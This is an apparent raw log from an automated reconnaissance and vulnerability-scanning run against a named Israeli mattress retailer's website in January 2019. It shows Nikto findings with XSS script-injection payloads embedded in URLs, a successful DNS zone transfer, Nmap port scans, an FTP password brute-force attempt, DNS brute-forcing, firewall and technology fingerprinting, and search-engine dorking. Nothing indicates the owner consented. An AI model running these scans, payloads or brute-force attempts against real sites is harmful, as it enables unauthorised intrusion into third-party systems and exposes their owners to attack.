- + OSVDB-50619: /index.1.html/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>: RSA ClearTrust allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-651: /index.1.html/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-27095: /index.1.html/bb000001.pl<script>alert('Vulnerable')</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-4765: /index.1.html/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>: Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2243: /index.1.html/addressbook/index.php?surname=<script>alert('Vulnerable')</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2243: /index.1.html/addressbook/index.php?name=<script>alert('Vulnerable')</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-54589: /index.1.html/a.jsp/<script>alert('Vulnerable')</script>: JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-38019: /index.1.html/?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/<script>alert('Vulnerable')</script>.thtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/<script>alert('Vulnerable')</script>.shtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/<script>alert('Vulnerable')</script>.jsp: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.1.html/<script>alert('Vulnerable')</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html.
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- babylon-woodline.co.il -----
- Host's addresses:
- __________________
- babylon-woodline.co.il. 14004 IN A 62.90.134.182
- Name Servers:
- ______________
- ns2.webid.co.il. 86003 IN A 212.150.246.99
- ns1.webid.co.il. 13156 IN A 62.90.134.182
- Mail (MX) Servers:
- ___________________
- mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for babylon-woodline.co.il on ns2.webid.co.il ...
- babylon-woodline.co.il. 14400 IN SOA (
- babylon-woodline.co.il. 14400 IN TXT "v=spf1
- babylon-woodline.co.il. 14400 IN MX 10
- babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
- babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
- babylon-woodline.co.il. 14400 IN A 62.90.134.182
- _domainkey.babylon-woodline.co.il. 14400 IN TXT o=~
- x._domainkey.babylon-woodline.co.il. 14400 IN TXT (
- ftp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- pop.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- smtp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- www.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- Trying Zone Transfer for babylon-woodline.co.il on ns1.webid.co.il ...
- babylon-woodline.co.il. 14400 IN SOA (
- babylon-woodline.co.il. 14400 IN TXT "v=spf1
- babylon-woodline.co.il. 14400 IN MX 10
- babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
- babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
- babylon-woodline.co.il. 14400 IN A 62.90.134.182
- _domainkey.babylon-woodline.co.il. 14400 IN TXT o=~
- x._domainkey.babylon-woodline.co.il. 14400 IN TXT (
- ftp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- pop.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- smtp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- www.babylon-woodline.co.il. 14400 IN A 62.90.134.182
- brute force file not specified, bay.
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up (0.24s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- Not shown: 336 closed ports, 124 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 2000/tcp open cisco-sccp
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- 5060/tcp open sip
- 8080/tcp open http-proxy
- 8081/tcp open blackice-icecap
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up (0.21s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- Not shown: 10 closed ports, 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
- NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
- NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
- NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up (0.23s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 2603 guesses in 180 seconds, average tps: 14.3
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 17 hops
- Service Info: OS: Unix
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 144.01 ms 10.246.200.1
- 2 144.31 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
- 3 171.32 ms 176.10.83.34
- 4 144.07 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 176.24 ms 80.91.253.248
- 6 177.65 ms ffm-bb3-link.telia.net (62.115.121.118)
- 7 181.66 ms ffm-b1-link.telia.net (62.115.116.160)
- 8 174.66 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
- 9 ...
- 10 229.13 ms gw2-hfa-0-2-0-2-200-gw2.fra.nv.net.il (212.143.12.13)
- 11 242.53 ms 212.143.12.32
- 12 245.84 ms core1-0-2-0-1-gw2.hfa.nv.net.il (212.143.7.24)
- 13 243.38 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
- 14 236.75 ms 82.166.37.254
- 15 234.25 ms 82.166.37.254
- 16 235.36 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 17 233.88 ms server.webid.co.il (62.90.134.182)
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:25 EST
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up (0.23s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- PORT STATE SERVICE VERSION
- 53/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- | dns-nsid:
- |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
- |_dns-zone-transfer: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|storage-misc|firewall|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 3.4 (89%), WatchGuard Fireware 11.8 (89%), Linux 3.10 (88%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 16 hops
- Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- Host script results:
- | dns-blacklist:
- | SPAM
- |_ l2.apews.org - SPAM
- | dns-brute:
- | DNS Brute-force hostnames:
- | host.co.il - 148.251.90.173
- | development.co.il - 144.76.61.240
- | http.co.il - 212.150.243.210
- | svn.co.il - 159.65.118.35
- | ads.co.il - 176.31.218.147
- | mysql.co.il - 216.239.32.21
- | mysql.co.il - 216.239.34.21
- | mysql.co.il - 216.239.36.21
- | mysql.co.il - 216.239.38.21
- | images.co.il - 162.219.30.82
- | news.co.il - 188.166.109.104
- | adserver.co.il - 195.128.177.33
- | info.co.il - 104.31.92.2
- | info.co.il - 104.31.93.2
- | test.co.il - 127.0.0.1
- | noc.co.il - 96.31.35.145
- | info.co.il - 2606:4700:30::681f:5c02
- | info.co.il - 2606:4700:30::681f:5d02
- | internal.co.il - 185.18.205.241
- | test1.co.il - 185.56.75.60
- | alpha.co.il - 34.243.190.172
- | alpha.co.il - 52.19.144.59
- | dns.co.il - 82.80.253.15
- | internet.co.il - 95.175.32.10
- | ns1.co.il - 178.32.55.171
- | intra.co.il - 62.219.78.222
- | test2.co.il - 209.88.192.216
- | ns2.co.il - 92.222.209.88
- | intranet.co.il - 194.90.1.109
- | testing.co.il - 192.117.125.106
- | download.co.il - 148.251.90.173
- | app.co.il - 34.242.176.33
- | upload.co.il - 192.185.139.151
- | ntp.co.il - 107.154.156.178
- | ntp.co.il - 107.154.163.178
- | apps.co.il - 176.31.218.147
- | erp.co.il - 69.163.219.179
- | vnc.co.il - 194.90.1.109
- | ops.co.il - 108.167.133.37
- | voip.co.il - 212.179.240.8
- | auth.co.il - 146.148.67.190
- | owa.co.il - 212.29.214.195
- | exchange.co.il - 181.215.116.38
- | linux.co.il - 81.218.80.235
- | pbx.co.il - 185.18.204.26
- | beta.co.il - 176.31.218.147
- | local.co.il - 80.244.174.35
- | secure.co.il - 62.219.17.162
- | blog.co.il - 212.143.60.51
- | log.co.il - 62.219.84.197
- | server.co.il - 148.251.90.173
- | shop.co.il - 188.166.109.104
- | sip.co.il - 213.8.172.5
- | manage.co.il - 212.199.211.142
- | mobile.co.il - 162.144.16.99
- | monitor.co.il - 194.90.1.109
- | mta.co.il - 212.199.167.22
- | web.co.il - 192.115.21.75
- | whois.co.il - 109.74.198.188
- | www2.co.il - 64.90.49.227
- | sql.co.il - 192.254.237.210
- | ssh.co.il - 81.218.229.185
- | firewall.co.il - 62.219.67.17
- | ssl.co.il - 82.80.253.21
- | forum.co.il - 62.219.11.147
- | stage.co.il - 52.58.94.54
- | chat.co.il - 95.175.47.103
- | ftp.co.il - 198.23.57.32
- | citrix.co.il - 165.160.13.20
- | citrix.co.il - 165.160.15.20
- | cms.co.il - 194.90.203.76
- | corp.co.il - 204.93.178.102
- | git.co.il - 81.218.229.200
- | crs.co.il - 136.243.93.246
- | cvs.co.il - 194.90.8.80
- | help.co.il - 138.201.204.221
- | home.co.il - 35.173.175.98
- | demo.co.il - 212.235.14.43
- |_ dev.co.il - 80.179.11.157
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 143.53 ms 10.246.200.1
- 2 143.88 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
- 3 153.87 ms 176.10.83.34
- 4 143.59 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 177.61 ms 213.155.133.212
- 6 175.83 ms ffm-bb3-link.telia.net (62.115.121.118)
- 7 209.91 ms ffm-b1-link.telia.net (62.115.121.5)
- 8 176.67 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
- 9 ...
- 10 228.81 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 11 229.37 ms 212.143.7.102
- 12 229.75 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
- 13 230.26 ms core1-rha-1-0-0-core1-hfa-5-0-7.nv.net.il (212.143.12.117)
- 14 235.22 ms 212.143.201.190
- 15 235.61 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 16 235.60 ms server.webid.co.il (62.90.134.182)
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://babylon-woodline.co.il
- The site http://babylon-woodline.co.il is behind a ModSecurity (OWASP CRS)
- Number of requests: 13
- #######################################################################################################################################
- http://babylon-woodline.co.il [301 Moved Permanently] Country[ISRAEL][IL], HTTPServer[nginx], IP[62.90.134.182], RedirectLocation[/index.1.html], nginx
- http://babylon-woodline.co.il/index.1.html [200 OK] Country[ISRAEL][IL], HTML5, HTTPServer[nginx], IP[62.90.134.182], JQuery, Meta-Author[ישראל ממליץ], Open-Graph-Protocol, Script[text/javascript], Title[מזרונים ליין], nginx
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://babylon-woodline.co.il...
- _________________________________________ SITE INFO __________________________________________
- IP Title
- 62.90.134.182 מזרונים ליין
- __________________________________________ VERSION ___________________________________________
- Name Versions Type
- Roundcube CMS
- phpMyAdmin CMS
- Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.5 | 2.4.6 | 2.4.7 | 2.4.8 Platform
- 2.4.9
- nginx Platform
- ______________________________________________________________________________________________
- Time: 111.5 sec Urls: 472 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 301 Moved Permanently
- Server: nginx
- Date: Wed, 23 Jan 2019 09:30:32 GMT
- Content-Type: text/html; charset=utf-8
- Connection: keep-alive
- Location: /index.1.html
- Vary: User-Agent
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [23-01-2019 04:30:53]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-babylon-woodline.co.il ]
- [ INFO ][ DORK ]::[ site:babylon-woodline.co.il ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.tr ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.mt ID: 012873187529719969291:yexdhbzntue ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 0 / 100 ]-[04:31:14] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-באיתנים ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 1 / 100 ]-[04:31:16] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-במבצע-באלראם ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 2 / 100 ]-[04:31:18] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרנים-זולים-כרמיה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 3 / 100 ]-[04:31:20] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-קטנים-ביובל ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 4 / 100 ]-[04:31:23] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-בפת ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 5 / 100 ]-[04:31:25] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרנים-בזול-אריאל ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 6 / 100 ]-[04:31:27] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-רשפון ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 7 / 100 ]-[04:31:29] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-בשמעה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 8 / 100 ]-[04:31:32] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-גבוהים-ביכיני ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 9 / 100 ]-[04:31:34] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-בזול-שבלי ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 10 / 100 ]-[04:31:36] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-בנשר ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 11 / 100 ]-[04:31:38] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-חדרה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 12 / 100 ]-[04:31:41] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-בגבת ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 13 / 100 ]-[04:31:43] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-במנוף ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 14 / 100 ]-[04:31:45] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-סכנין ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 15 / 100 ]-[04:31:48] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-שרונה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 16 / 100 ]-[04:31:50] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-בשעב ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 17 / 100 ]-[04:31:52] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-במסד ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 18 / 100 ]-[04:31:55] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-יזרעם ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 19 / 100 ]-[04:31:57] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-בגנות ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 20 / 100 ]-[04:31:59] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-בדור ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 21 / 100 ]-[04:32:01] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרנים-בזול-מיצר ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 22 / 100 ]-[04:32:03] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-זוגי-בסכנין ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 23 / 100 ]-[04:32:06] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-אחיהוד ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 24 / 100 ]-[04:32:08] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-באלעד ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 25 / 100 ]-[04:32:10] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-ב1000-בחנתון ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 26 / 100 ]-[04:32:13] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-בצפת ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 27 / 100 ]-[04:32:15] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-200-באלרואי ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 28 / 100 ]-[04:32:17] [ - ]
- |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-בבצרה ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 29 / 100 ]-[04:32:19] [ - ]
